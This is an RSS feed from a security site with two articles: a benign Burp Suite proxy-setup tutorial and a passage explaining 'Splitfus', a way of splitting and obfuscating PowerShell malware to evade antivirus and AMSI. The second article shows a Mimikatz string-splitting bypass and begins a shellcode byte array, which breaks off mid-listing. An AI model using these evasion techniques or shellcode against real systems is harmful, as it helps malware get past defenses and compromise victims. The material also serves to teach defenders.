<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Security &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Fri, 17 Apr 2026 21:58:30 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.1</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>Security &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to intercept traffic using Burp Suite to analyze HTTP/HTTPS</title>
		<link>https://en.anonyviet.com/how-to-intercept-traffic-using-burp-suite-to-analyze-http-https/</link>
					<comments>https://en.anonyviet.com/how-to-intercept-traffic-using-burp-suite-to-analyze-http-https/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 17 Apr 2026 21:58:30 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[analyze]]></category>
		<category><![CDATA[Burp]]></category>
		<category><![CDATA[HTTPHTTPS]]></category>
		<category><![CDATA[intercept]]></category>
		<category><![CDATA[Suite]]></category>
		<category><![CDATA[Traffic]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=21837</guid>

					<description><![CDATA[Quick Answer: To block HTTP/HTTPS traffic using Burp Suiteyou need to install Burp, configure the browser to use a proxy 127.0.0.1:8080then install the certificate Burp CA into the browser. When the feature is enabled Interceptevery request from the browser will go through Burp before reaching the server, allowing you to view and edit data. 📢 [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>Quick Answer:</strong> To block HTTP/HTTPS traffic using <strong>Burp Suite</strong>you need to install Burp, configure the browser to use a proxy <strong>127.0.0.1:8080</strong>then install the certificate <strong>Burp CA</strong> into the browser. When the feature is enabled <strong>Intercept</strong>every request from the browser will go through Burp before reaching the server, allowing you to view and edit data.</p>
<div class="av-telegram-box" style="margin:16px 0;">
<div style="border:1px solid #dbeafe; background:linear-gradient(135deg,#eff6ff 0%,#ecfeff 100%); border-radius:14px; padding:14px 16px; box-shadow:0 4px 14px rgba(0,0,0,.06); text-align:center;">
<p> <span style="display:inline-block; margin-right:4px;">📢</span> Join the channel <span style="color:#2563eb;">Telegram</span> belong to <span style="color:#0f766e;">AnonyViet</span></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" rel="noopener nofollow" style="display:inline-flex; align-items:center; justify-content:center; gap:8px; background:#229ED9; color:#fff; text-decoration:none; font-weight:700; font-size:14px; padding:10px 14px; border-radius:10px; box-shadow:0 4px 10px rgba(34,158,217,.25);"><br />
<span>👉 Go to Telegram AnonyViet</span><br />
</a></p>
<p>  Update new articles, cool tools and IT tips fastest</p>
</div>
</div>
<p>When working with <strong>Web Security</strong>observing and editing HTTP requests is an extremely important skill. This is how security experts detect vulnerabilities such as <em>SQL Injection, XSS, Authentication Bypass</em> or debug API.</p>
<p>One of the most popular tools today is <strong>Burp Suite</strong> – web security testing toolkit by <strong>PortSwigger</strong> develop.</p>
<p>In this article, AnonyViet will guide you how to set up Burp Suite to:</p>
<ul>
<li>Block all web traffic from browsers</li>
<li>Analyze HTTP request/response</li>
<li>Decrypt HTTPS traffic with TLS Certificate</li>
</ul>
<p><img post-id="21837" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter wp-image-34004 size-full" src="https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard.jpg" alt="How to intercept traffic using Burp Suite to analyze HTTP/HTTPS" title="How to intercept traffic using Burp Suite to analyze HTTP/HTTPS" width="901" height="452" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 20" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard.jpg 400w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-768x385.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-750x376.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-120x60.jpg 120w" sizes="(max-width: 901px) 100vw, 901px"/></p>
<h2 id="ftoc-burp-suite-la-gi" class="ftwp-heading">What is Burp Suite?</h2>
<p><strong>Burp Suite</strong> (often referred to as <strong>Burp</strong>) is a graphical tool that helps test Web application security.</p>
<p>It works like one <strong>intermediary proxy (MITM – Man in the Middle)</strong> between browser and server. When the request goes through Burp, you can:</p>
<ul>
<li>View all HTTP requests</li>
<li>Edit parameters</li>
<li>Header analysis</li>
<li>Replay request</li>
<li>API security testing</li>
</ul>
<p>Burp Suite has many versions:</p>
<ul>
<li><strong>Community Edition</strong> &#8211; free of charge</li>
<li><strong>Professional</strong> – for pentester</li>
<li><strong>Enterprise</strong> – large-scale security testing</li>
</ul>
<p>This article uses version <strong>Community Edition</strong>.</p>
<h2 id="ftoc-nhung-gi-chung-ta-se-thuc-hien" class="ftwp-heading">What we will do</h2>
<p>To block traffic with Burp Suite, you will take 3 main steps:</p>
<ol>
<li>Download and install Burp Suite</li>
<li>Configure the browser to use Burp&#8217;s proxy</li>
<li>Install a TLS certificate to block HTTPS</li>
</ol>
<h2 id="ftoc-buoc-1-tai-va-cai-dat-burp-suite" class="ftwp-heading">Step 1: Download and install Burp Suite</h2>
<p>You can download Burp Suite Community at PortSwigger&#8217;s official site:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fportswigger.net%2Fburp%2Fcommunitydownload" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://portswigger.net/burp/communitydownload</a></p>
<p>Note:</p>
<ul>
<li>Burp Suite requests <strong>Java Runtime</strong></li>
<li>Supports Windows, Linux and macOS</li>
</ul>
<p>After installing and opening Burp Suite, you will see the project initialization interface:</p>
<p><img decoding="async" class="size-full wp-image-33990 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-1.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 18" width="722" height="464" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 21" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-1.jpg 722w, https://anonyviet.com/wp-content/uploads/2021/09/burp-1-300x193.jpg 300w" sizes="(max-width: 722px) 100vw, 722px"/></p>
<p>If you don&#8217;t want to save the project:</p>
<ul>
<li>Press <strong>Next</strong></li>
<li>Then choose <strong>Start Burp</strong></li>
</ul>
<p><img decoding="async" class="size-full wp-image-33991 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-2.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 19" width="711" height="453" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 22" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-2.jpg 711w, https://anonyviet.com/wp-content/uploads/2021/09/burp-2-300x191.jpg 300w" sizes="(max-width: 711px) 100vw, 711px"/></p>
<p>The main interface of Burp Suite will appear:</p>
<p><img decoding="async" class="size-full wp-image-33992 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-3.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 20" width="1085" height="539" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 23" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-3.jpg 1085w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-1024x509.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-768x382.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-750x373.jpg 750w" sizes="(max-width: 1085px) 100vw, 1085px"/></p>
<h2 id="ftoc-buoc-2-cau-hinh-proxy-cho-trinh-duyet" class="ftwp-heading">Step 2: Configure Proxy for the browser</h2>
<p>In order for Burp to block requests, the browser must send traffic through Burp&#8217;s proxy.</p>
<p>In this example I use <strong>Firefox</strong>.</p>
<p>Open settings:</p>
<p><strong>about:preferences#general</strong></p>
<p>Scroll down to the section <strong>Network Settings</strong> and press <strong>Settings</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33993 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-4.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 21" width="512" height="607" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 24" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-4.jpg 512w, https://anonyviet.com/wp-content/uploads/2021/09/burp-4-253x300.jpg 253w" sizes="(max-width: 512px) 100vw, 512px"/></p>
<p>Set up the proxy as follows:</p>
<ul>
<li><strong>Manual proxy configuration</strong></li>
<li>HTTP Proxy: <strong>127.0.0.1</strong></li>
<li>Port: <strong>8080</strong></li>
<li>Tick <strong>Use this proxy for all protocols</strong></li>
</ul>
<p>Then press <strong>OK</strong>.</p>
<p>Now all browser traffic will go through Burp.</p>
<h2 id="ftoc-kiem-tra-proxy-listener-cua-burp" class="ftwp-heading">Check out Burp&#8217;s Proxy Listener</h2>
<p>Open Burp Suite:</p>
<p><img decoding="async" class="size-full wp-image-33994 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-5.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 22" width="612" height="321" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 25" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-5.jpg 612w, https://anonyviet.com/wp-content/uploads/2021/09/burp-5-300x157.jpg 300w" sizes="(max-width: 612px) 100vw, 612px"/></p>
<p>Make sure the Proxy Listener is:</p>
<ul>
<li>Host: <strong>127.0.0.1</strong></li>
<li>Port: <strong>8080</strong></li>
<li>Status: <strong>Running</strong></li>
</ul>
<h2 id="ftoc-test-chan-luu-luong-http" class="ftwp-heading">Test blocking HTTP traffic</h2>
<p>Access the simple HTTP page:</p>
<p><strong>http://neverssl.com</strong></p>
<p>Burp will block the request and display it in the tab <strong>Intercept</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33995 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-6.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 23" width="572" height="252" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 26" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-6.jpg 572w, https://anonyviet.com/wp-content/uploads/2021/09/burp-6-300x132.jpg 300w" sizes="(max-width: 572px) 100vw, 572px"/></p>
<p>You can:</p>
<ul>
<li>See header</li>
<li>Edit parameters</li>
<li>Forward requests</li>
<li>Drop requests</li>
</ul>
<h2 id="ftoc-tai-sao-https-bi-loi-tls" class="ftwp-heading">Why does HTTPS fail TLS?</h2>
<p>When accessing an HTTPS site like:</p>
<p><strong>https://google.com</strong></p>
<p>You will see a TLS error.</p>
<p><img decoding="async" class="size-full wp-image-33996 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-7.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 24" width="657" height="243" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 27" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-7.jpg 657w, https://anonyviet.com/wp-content/uploads/2021/09/burp-7-300x111.jpg 300w" sizes="(max-width: 657px) 100vw, 657px"/></p>
<p>Reason:</p>
<ul>
<li>HTTPS encrypts data using TLS</li>
<li>Burp is in the middle (MITM)</li>
<li>The browser does not trust Burp&#8217;s certificate</li>
</ul>
<p>Therefore we need to install Burp&#8217;s CA certificate.</p>
<h2 id="ftoc-buoc-3-cai-chung-chi-burp-ca-de-chan-https" class="ftwp-heading">Step 3: Install Burp CA certificate to block HTTPS</h2>
<p>Open a browser and access:</p>
<p><strong>http://burp/</strong></p>
<p>Press <strong>CA Certificate</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33997 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-8.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 25" width="1428" height="329" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 28" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-8.jpg 1428w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-300x69.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-1024x236.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-768x177.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-750x173.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-1140x263.jpg 1140w" sizes="(max-width: 1428px) 100vw, 1428px"/></p>
<p>Save the certificate file.</p>
<p>Next open:</p>
<p><strong>about:preferences</strong></p>
<p>Search <strong>Certificates</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33998 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-9.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 26" width="697" height="248" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 29" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-9.jpg 697w, https://anonyviet.com/wp-content/uploads/2021/09/burp-9-300x107.jpg 300w" sizes="(max-width: 697px) 100vw, 697px"/></p>
<p>Select:</p>
<ul>
<li>View Certificates</li>
<li>Authorities</li>
<li>Import</li>
</ul>
<p>Select the Burp certificate file you just downloaded.</p>
<p><img decoding="async" class="size-full wp-image-33999 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/nurp-10.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 27" width="648" height="344" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 30" srcset="https://anonyviet.com/wp-content/uploads/2021/09/nurp-10.jpg 648w, https://anonyviet.com/wp-content/uploads/2021/09/nurp-10-300x159.jpg 300w" sizes="(max-width: 648px) 100vw, 648px"/></p>
<p>Tick ​​both options:</p>
<ul>
<li>Trust this CA to identify websites</li>
<li>Trust this CA to identify email users</li>
</ul>
<p>Press <strong>OK</strong>.</p>
<p>You can now block HTTPS without TLS errors.</p>
<h2 id="ftoc-cach-burp-suite-chan-request" class="ftwp-heading">How Burp Suite blocks requests</h2>
<p>Open:</p>
<p><strong>Proxy → Intercept</strong></p>
<p><img decoding="async" class="size-full wp-image-34000 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-b-1.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 28" width="1440" height="810" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 31" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-b-1.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px"/></p>
<p>When turned on <strong>Intercept is ON</strong>:</p>
<ul>
<li>Request stops at Burp</li>
<li>You can edit the data</li>
<li>Then press <strong>Forward</strong></li>
</ul>
<p>For example, when logging into a website:</p>
<p><img decoding="async" class="size-full wp-image-34001 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 29" width="1440" height="810" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 32" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px"/></p>
<p>You will see:</p>
<ul>
<li>HTTP headers</li>
<li>Cookies</li>
<li>POST data</li>
<li>Tokens</li>
</ul>
<h3 id="ftoc-chinh-sua-tham-so-request" class="ftwp-heading">Edit request parameters</h3>
<p>Switch tabs <strong>Params</strong>.</p>
<p><img decoding="async" class="size-full wp-image-34002 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 30" width="1440" height="810" title="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 33" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px"/></p>
<p>Here you can:</p>
<ul>
<li>Edit value</li>
<li>Add parameters</li>
<li>Delete parameters</li>
</ul>
<p>This is how the pentester checks the server&#8217;s logic.</p>
<h2 id="ftoc-xem-toan-bo-lich-su-request" class="ftwp-heading">View full request history</h2>
<p>To see all requests:</p>
<p><strong>Proxy → HTTP History</strong></p>
<p><img decoding="async" class="size-full wp-image-34003 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5.jpg" alt="How to intercept traffic with Burp Suite to analyze HTTP/HTTPS 31" width="1440" height="810" title="How to intercept traffic using Burp Suite to analyze HTTP/HTTPS 34" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px"/></p>
<p>You will see:</p>
<ul>
<li>List of requests</li>
<li>Status code</li>
<li>Domain</li>
<li>Method (GET/POST)</li>
</ul>
<p>Very useful when analyzing APIs or debugging web apps.</p>
<h2 id="ftoc-use-case-thuc-te-tai-viet-nam" class="ftwp-heading">Actual use-case in Vietnam</h2>
<p>Burp Suite is often used to:</p>
<ul>
<li>Analyze mobile app API</li>
<li>Debug website requests</li>
<li>Reverse engineer web service</li>
<li>Web security testing</li>
</ul>
<p>Many classmates <strong>Bug Bounty</strong> or <strong>Web Pentest</strong> all start with Burp.</p>
<p>If you are new to web security, you should combine it with a practice platform such as:</p>
<ul>
<li>TryHackMe</li>
<li>PortSwigger Web Security Academy</li>
</ul>
<h2 id="ftoc-loi-thuong-gap-khi-dung-burp-suite" class="ftwp-heading">Common errors when using Burp Suite</h2>
<h3 id="ftoc-1-khong-chan-duoc-request" class="ftwp-heading">1. Cannot block requests</h3>
<p>The cause is usually due to:</p>
<ul>
<li>Proxy is not configured correctly</li>
<li>Wrong port</li>
<li>Listener is not running</li>
</ul>
<h3 id="ftoc-2-https-bi-loi-tls" class="ftwp-heading">2. HTTPS fails TLS</h3>
<p>The Burp CA certificate has not been installed in the browser.</p>
<h3 id="ftoc-3-website-khong-tai" class="ftwp-heading">3. Website does not load</h3>
<p>Because Intercept is on but you have not forwarded the request yet.</p>
<h2 id="ftoc-faq-cau-hoi-thuong-gap" class="ftwp-heading">FAQ – Frequently asked questions</h2>
<h3 id="ftoc-burp-suite-co-mien-phi-khong" class="ftwp-heading">Is Burp Suite free?</h3>
<p>Have. Burp Suite Community Edition is free but some advanced features are only available in the Professional version.</p>
<h3 id="ftoc-burp-suite-co-dung-de-hack-khong" class="ftwp-heading">Is Burp Suite used for hacking?</h3>
<p>Burp Suite is a legitimate security testing tool. It is used by pentesters and security experts to detect vulnerabilities.</p>
<h3 id="ftoc-co-can-java-de-chay-burp-suite-khong" class="ftwp-heading">Is Java needed to run Burp Suite?</h3>
<p>New versions have integrated runtime, but some older versions still require Java.</p>
<h3 id="ftoc-nen-dung-trinh-duyet-nao-voi-burp" class="ftwp-heading">Which browser should I use with Burp?</h3>
<p>Firefox is often used because it is easy to configure proxies and certificates.</p>
<h2 id="ftoc-checklist-thiet-lap-burp-suite" class="ftwp-heading">Burp Suite setup checklist</h2>
<ul>
<li>Install Burp Suite Community</li>
<li>Proxy configuration 127.0.0.1:8080</li>
<li>Check Proxy Listener</li>
<li>Download Burp CA certificate</li>
<li>Import into Firefox</li>
<li>Turn on Intercept</li>
<li>Analyze request/response</li>
</ul>
<h2 id="ftoc-ket-luan" class="ftwp-heading">Conclude</h2>
<p><strong>Burp Suite</strong> is an extremely important tool in the field <strong>Web Security</strong>. Knowing how to intercept and analyze HTTP/HTTPS traffic helps you understand how web applications work and detect security issues.</p>
<p>If you are studying <strong>Pentest</strong>, <strong>Bug Bounty</strong> or API analysis, mastery of Burp Suite is an almost mandatory skill.</p>
<p>In the next articles, AnonyViet will provide further instructions on:</p>
<ul>
<li>Repeater</li>
<li>Intruder</li>
<li>Burp automation</li>
<li>Exploit real web vulnerabilities</li>
</ul>
<h2 id="ftoc-nguon-tham-khao" class="ftwp-heading">Reference source</h2>
<ul>
<li>PortSwigger Web Security Academy</li>
<li>TryHackMe</li>
<li>Burp Suite Official Document</li>
</ul>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-intercept-traffic-using-burp-suite-to-analyze-http-https/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to use hackers use Splitfus to execute PowerShell malicious code</title>
		<link>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/</link>
					<comments>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 20 Jul 2025 03:17:51 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[execute]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[PowerShell]]></category>
		<category><![CDATA[Splitfus]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=19612</guid>

					<description><![CDATA[Currently, defensive systems such as Antivirus (AV) and Endpoint detection &#038; response (EDR) are increasingly strong. However, hackers are constantly creating sophisticated techniques to overcome this protective layer. One of the common techniques is Splitfus. This is the method of dividing the PowerShell code and disturbing the code (Obfuscate), then executing each part in many [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Currently, defensive systems such as Antivirus (AV) and Endpoint detection &#038; response (EDR) are increasingly strong. However, hackers are constantly creating sophisticated techniques to overcome this protective layer. One of the common techniques is <strong>Splitfus.</strong> This is the method of dividing the PowerShell code and disturbing the code (Obfuscate), then executing each part in many stages (staged deliver). So why is this technique so effective? Let&#8217;s find out with me!</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<p>Splitfus (abbreviated for <strong>Split + Obfusication</strong>) is the technique that hackers use to:</p>
<ul>
<li><strong>Split (Split)</strong> Powershell malware into many paragraphs, for example: malware1.ps1, malware2.ps1, malware3.ps1, &#8230;</li>
<li><strong>Obfuscate (Obfuscate)</strong> Each code to avoid being analyzed or detected by AV&#8217;s signature</li>
<li><strong>Execution in many stages (stageding)</strong>: When performing the attack, the victim will download each code from the hacker server and run directly in the memory, instead of saving the entire Payload on the disc. This is a realistic type that is commonly known as <strong>Multi-Stage Attack</strong> or <strong>Fileless malware</strong></li>
</ul>
<ul>
<li><strong>Reducing the possibility of being detected by signature-based detection</strong></li>
<li>Traditional AV is based on signatures or unique designs. When the malicious code is broken down and encoded, there is no paragraph containing the entire Payload, making the detection difficult.</li>
<li><strong>Avoid scanning and sandbox</strong>
<ul>
<li>If the entire Payload is in a file, AV is easy to analyze before running</li>
<li>With Splitfus, the monopoly is dynamic (on-demand) from the hacker server, so the sandbox environment is difficult to recreate the entire process</li>
</ul>
</li>
<li><strong>BYPASS AMSI (Antimalware Scan Interface)</strong></li>
<li>Windows Amsi is capable of scanning PowerShell content before execution. However, with Splitfus:
<ul>
<li>Small codes, Obfuscated and dynamic loads → difficult to be fully analyzed by Amsi</li>
<li>Many hackers also combine <strong>Amsi bypass</strong> With Splitfus to increase efficiency</li>
</ul>
</li>
<li><strong>Flexible and easy to update</strong></li>
<li>Hackers can change any segment on the server without spreading the entire Payload. This makes it harder for tracing or developing AV signatures</li>
</ul>
<p>The simple theoretical part is so short, now I will take the actual example for you to easily imagine how the technique is done</p>
<p>Many APT and Malware Framework attack campaigns like <strong>Cobalt Strike, PowerShell Empire, Metasploit</strong> has applied the same mechanism as Splitfus to spread Payload Staged. This is a popular trend in current fileless attacks.</p>
<p>Alright, now I try to run a piece of PowerShell code: Write-Host &#8220;Invoke-Mimikatz&#8221;. Oh you see, Antivirus discovered and blocked this code. This is only a piece of code printing out the string on the Terminal, why is it blocked? Because it contains a string of characters <strong>&#8220;Invoke-Mimikatz&#8221;</strong>. This is one <strong>Signature (signature)</strong> Extremely famous and typical of the attack tool <strong>Mimikatz</strong></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221618-png.png" alt="Screenshot 2025-07-18 221618.PNG" title="How to use hackers use Splitfus to execute PowerShell 9 Code"/></p>
<p>Thus, the AVs are configured to immediately block any code containing this dangerous signature, even at the earliest stage, to prevent all potential intentions related to Mimikatz. This is a risk prevention measure.</p>
<p>So we already know how to AV is configured, now try separating the &#8220;Invoke-Mimikatz&#8221; string into many different short chains.</p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221712-png.png" alt="Screenshot 2025-07-18 221712.Png" title="How to use hackers use Splitfus technique to execute PowerShell 10 malicious code"/></p>
<p>As you can see, although separating the chain into small parts such as &#8220;Invo&#8221;, &#8220;ke&#8221;, &#8220;-mim&#8221;, &#8220;ikatz&#8221;, AV still does not detect malicious code. Later, when we resumed these strings in the process of implementing the results, &#8220;Invoke-Mimikatz&#8221; but has surpassed AV&#8217;s detection system. This is the simplest example of Splitfus</p>
<p>Now let&#8217;s see a more realistic exploitation example with the following PowerShell code, with the file called SC-Boriginal.ps1</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,&#13;
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,&#13;
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,&#13;
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,&#13;
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,&#13;
